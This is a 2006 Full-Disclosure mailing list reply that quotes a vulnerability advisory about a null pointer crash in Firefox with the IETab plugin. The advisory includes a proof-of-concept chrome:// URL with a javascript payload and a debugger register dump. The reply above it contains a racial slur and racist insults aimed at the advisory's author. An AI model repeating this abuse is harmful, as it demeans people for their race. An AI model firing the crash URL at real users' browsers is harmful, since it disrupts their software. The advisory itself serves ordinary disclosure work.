[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Firefox (with IETab Plugin) Null Pointer Dereferences Bug



Dear Tan Colored Niggerish Guy,

This is not the right list for Mozilla extension bug reports. This list is
for security stuff only guy :)

PERFECT.MATERIAL

P.S. Your race smells bad you worthless idiot!

On 5/17/06, Debasis Mohanty <debasis.mohanty.listmails@xxxxxxxxx> wrote:

Firefox (with IETab Plugin) Null Pointer Dereferences Bug
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab

Bugzilla ID: 14151 (http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
(Initially I incorrectly logged the bug under the wrong product,
thanks to Dan Veditz to log it under appropriate product on behalf of
me).

Tested On:
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction:
IETab (https://addons.mozilla.org/firefox/1419/) is a recently
released (April 12, 2006) plugin for Firefox. It is used to browse IE
(only) specific sites under Firefox. Guess what ?? You can run
windowsupdate under FireFox
;-)

Bug Details:
Firefox with the IETab installed crashes when ietab plugin is unable
to handle specific javascripts. It seems to be a null pointer
dereference bug.
For more details refer the PoC section.

Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter -

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie
);

Note: This test will not work if IETab is not installed.

The Registers details after the crash:

(1e4.3e0): Access violation - code c0000005 (first chance) First
chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010246

npietab!NP_GetEntryPoints+0xb8ac:

0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????



For more vulnerabilities :
http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/